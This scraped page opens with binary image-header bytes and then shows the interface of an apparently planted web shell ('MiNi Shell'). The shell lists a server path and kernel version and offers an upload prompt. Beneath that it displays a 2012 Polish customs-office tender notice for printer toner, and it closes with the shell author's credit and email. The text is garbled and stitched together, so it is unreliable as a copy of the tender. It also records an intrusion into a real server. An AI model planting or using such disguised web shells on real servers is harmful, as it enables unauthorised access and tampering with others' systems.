JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120530/179202-N-2012.html

<p class="kh_header"><b>Łódź: Dostawa materiałów eksploatacyjnych</b><br>
<b>Numer ogłoszenia: 179202 - 2012; data zamieszczenia: 30.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Łodzi , ul. Lodowa 97, 93-232 Łódź, woj. łódzkie, tel. 42 6388277, faks 42 6388354.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodz.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych dla potrzeb Izby Celnej w Łodzi. Wykaz materiałów eksploatacyjnych wraz z ilościami zawiera załącznik nr 1 do niniejszego ogłoszenia
(załącznik dostępny jest na stronie www.lodz.ic.gov.pl, zakładka: zamówienia publiczne). Ilości
zamawianego asortymentu są ilościami szacunkowymi, służącymi do skalkulowania ceny oferty i
mogą w trakcie realizacji umowy ulec zmianie. 1) Oferowane materiały eksploatacyjne nie mogą
być produktami regenerowanymi i refabrykowanymi, tj. nowa obudowa, nowy toner , nowe opakowanie nienoszące znamion otwierania.
Za fabrycznie nowy nie uznaje się wyrobu gdzie pojemnik został jedynie wyczyszczony i ponownie
napełniony tonerem. Jakość wydruku/kopii, wydajność, szybkość schnięcia/utrwalenia,
nie zamazywania się druku/kopii winna odpowiadać wyrobowi producenta urządzenia, w tym
również w zakresie bezawaryjnej pracy tego urządzenia, w którym będzie zainstalowany. Tonery muszą być opakowane w typowe opakowania dla danego produktu, zaopatrzone w etykiety
identyfikujące dany produkt i termin jego ważności. Muszą posiadać znak firmowy i określenie
pochodzenia (producenta tonerów). Jeżeli w trakcie trwania umowy Zamawiający stwierdzi,
że wydajność, jakość lub niezawodność dostarczonych materiałów eksploatacyjnych
równoważnych znacząco odbiega od parametrów produktu oryginalnego (pochodzącego od
producenta urządzenia, do którego materiał jest przeznaczony), Wykonawca na żądanie
Zamawiającego będzie zobligowany do wymiany na materiał wolny od wad, spełniający wymagania
Zamawiającego (np. pochodzący od producenta, do którego materiał jest przeznaczony), bez
zmiany ceny. 2) Zamawiający dopuszcza możliwość składania ofert równoważnych, ale jedynie
takich, które gwarantują, ich równoważny materiał eksploatacyjny spełnia wszystkie wymogi, normy i
parametry techniczne, o wydajności min. takiej, jaką gwarantuje producent poszczególnych
materiałów eksploatacyjnych określonych w załączniku nr 1 do ogłoszenia. 3) Oferowany materiał
równoważny odpowiada typowi wskazanemu w załączniku nr 1 i jest materiałem eksploatacyjnym
dobrej jakości, posiadającym możliwość zastosowania i przewidzianym (przydatnym) do użycia w
danym typie urządzenia. 4) Stosowanie zaoferowanego równoważnego materiału eksploatacyjnego
nie naraża Zamawiającego na ryzyko poniesienia jakiejkolwiek szkody, w szczególności polegającej
na uszkodzeniu urządzenia, do którego ów równoważny materiał eksploatacyjny jest przeznaczony,
lub utraty przez Zamawiającego uprawnień wynikających z tytułu gwarancji serwisowej. 5) W
przypadku powstania uszkodzenia urządzenia na skutek stosowania zaoferowanego
równoważnego materiału eksploatacyjnego, Wykonawca zobowiązuje się do niezwłocznego
pokrycia ewentualnych kosztów napraw urządzenia dokonanych przez autoryzowany serwis
producenta. Faktura za naprawę urządzenia zostanie wystawiona na Wykonawcę, który ją
akceptuje bezwarunkowo i nieodwołalnie oraz dokonuje zapłaty w ustalonym terminie. Wykonawca
zobowiązuje się dostarczyć naprawione urządzenie do siedziby Zamawiającego na własny koszt i
ryzyko. 6) Podstawą do obciążenia kosztami naprawy, o której mowa w pkt. 1. 5 jest opinia
wystawiona przez biegłego na koszt Wykonawcy, stwierdzająca uszkodzenie sprzętu, wynikające z
użycia materiału eksploatacyjnego dostarczonego przez Wykonawcę. 7) Okres gwarancji na
dostarczony przedmiot zamówienia musi wynosić minimum 12 miesięcy i będzie liczony od daty odbioru
przedmiotu zamówienia bez zastrzeżeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.43.00-7.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia,
o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia,
o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia,
o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia,
o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia,
o którym mowa w pkt. III.4.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny wpis do ewidencji działalności gospodarczej - wymagany w celu potwierdzenia, że osoba
podpisująca ofertę jest uprawniona do reprezentowania wykonawcy (nie dotyczy osób fizycznych
nieprowadzących działalności gospodarczej). Pełnomocnictwo - w przypadku, gdy wykonawcę
reprezentuje pełnomocnik. Pełnomocnictwo powinno być podpisane przez osoby reprezentujące
osobę prawną lub fizyczną. Pełnomocnictwo musi być złożone w formie oryginału bądź odpisu
poświadczonego za zgodność z oryginałem przez notariusza.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych
podmiotów. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu w oryginale pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na
okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://www.lodz.ic.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania
formalne: 1) Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani
w systemie pod adresem http://licytacje.uzp.gov.pl 2) Wykonawca, aby umożliwić Zamawiającemu
dopuszczenie go do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie
http://licytacje.uzp.gov.pl , a wraz z wnioskiem o dopuszczenie go do udziału w licytacji winien
przekazać Zamawiającemu informację o swoim loginie. 3) W przypadku podania przez Wykonawcę
niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z wnioskiem, Wykonawca
zobowiązany jest do jego przekazania najpóźniej jeden dzień przed terminem otwarcia licytacji. 2.
Wymagania techniczne: Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne
określone przez producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub
wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej, z zainstalowaną jedną z w/w przeglądarek lub
przeglądarką równoważną, podłączony do sieci Internet..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Licytacja elektroniczna na dostawę będzie licytacją jednoetapową. 2.
Cena wywoławcza wynosi: 31917,51 zł brutto, za całą dostawę. 3. Minimalna wartość postąpienia
wynosi 200,00 zł brutto. 4. Zaproszeni Wykonawcy składają w trakcie licytacji elektronicznej kolejne
korzystniejsze postąpienia. 5. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej
zamknięcia. 6. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę
korzystniejszą. 7. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w
złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. 8. Oferta złożona
przez Wykonawcę winna być niższa od oferty najkorzystniejszej, co najmniej o kwotę minimalnego
postąpienia. 9. W toku licytacji zamawiający za pośrednictwem platformy licytacyjnej na bieżąco
będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert,
liczbie wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z
tym, że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację
wykonawców. 10. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę
brutto. 11. Kryterium oceny ofert jest najniższa cena brutto za wykonanie całego zamówienia. 12.
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany będzie do
dostarczenia Zamawiającemu w ciągu 3 dni od daty zamknięcia licytacji wykazu materiałów
eksploatacyjnych, stanowiący załącznik nr 1 do ogłoszenia, poprzez wpisanie do niego nazwy
producenta oferowanego przedmiotu zamówienia, cen jednostkowych oraz wartości całego
przedmiotu zamówienia w złotych polskich, która musi być tożsama z ceną zaoferowaną w licytacji.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> Etap zakończy się, jeżeli w ciągu 15 minut od złożenia najkorzystniejszego postąpienia, żaden z wykonawców nie złoży korzystniejszego postąpienia lub gdy w okresie 15 minut od otwarcia licytacji nie zostanie złożone żadne postąpienie</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 11.06.2012 godzina 12:00, miejsce: Kancelaria Izby Celnej w Łodzi, ul. Lodowa 97, 93-232 Łódź.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godzinie 12:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>15 minut po złożeniu ostatniego postąpienia</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie wymaga zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Projekt umowy stanowi załącznik nr 5 do ogłoszenia (dostępny na stronie internetowej
zamawiającego http://www.lodz.ic.gov.pl)</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Opis sposobu porozumiewania się zamawiającego z wykonawcami.
1) Wszelkiego rodzaju oświadczenia, wnioski, zawiadomienia, informacje zamawiający i
Wykonawcy przekazują droga elektroniczną na adres ic.wl@lod.mofnet.gov.pl lub faksem 42/63-88-
354. 2) Od momentu otwarcia licytacji do momentu zamknięcia licytacji, zgodnie z art. 77 ustawy,
Zamawiający i Wykonawcy przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną,
za pośrednictwem platformy licytacyjnej http://licytacje.uzp.gov.pl 2. Sposób przygotowania i termin
składania wniosków o dopuszczenie do udziału w licytacji elektronicznej. 1) Wniosek o
dopuszczenie do licytacji, którego wzór stanowi załącznik nr 2 do ogłoszenia musi być sporządzony
w języku polskim, w formie pisemnej. Dokumenty muszą być podpisane przez osoby upoważnione
do reprezentowania Wykonawcy. 2) W przypadku składania dokumentów w formie kopii, muszą
one być poświadczone za zgodność z oryginałem przez osobę uprawnioną do reprezentacji
Wykonawcy, z wyjątkiem pełnomocnictwa (w formie oryginału albo kopii poświadczonej przez
notariusza za zgodność z oryginałem). Poświadczenie za zgodność z oryginałem winno być
sporządzone w sposób umożliwiający identyfikację podpisu (np.: wraz z imienną pieczątką osoby
poświadczającej kopię dokumentu za zgodność z oryginałem). 3) Wniosek o dopuszczenie do
licytacji, wraz z dokumentami i oświadczeniami należy składać w zamkniętej kopercie, opatrzonej
napisem- Wniosek o dopuszczenie do udziału w licytacji elektronicznej na dostawę materiałów
eksploatacyjnych- nie otwierać przed 11.06.2012r. r. godz. 12:00- w terminie do dnia 11.06.2012r.
do godz. 12:00 w siedzibie Zamawiającego, tj.: Kancelaria Izby Celnej w Łodzi ul. Lodowa 97 93-
232 Łódź. Dla wniosków przesłanych do Zamawiającego liczy się data i godzina dostarczenia do
siedziby Zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com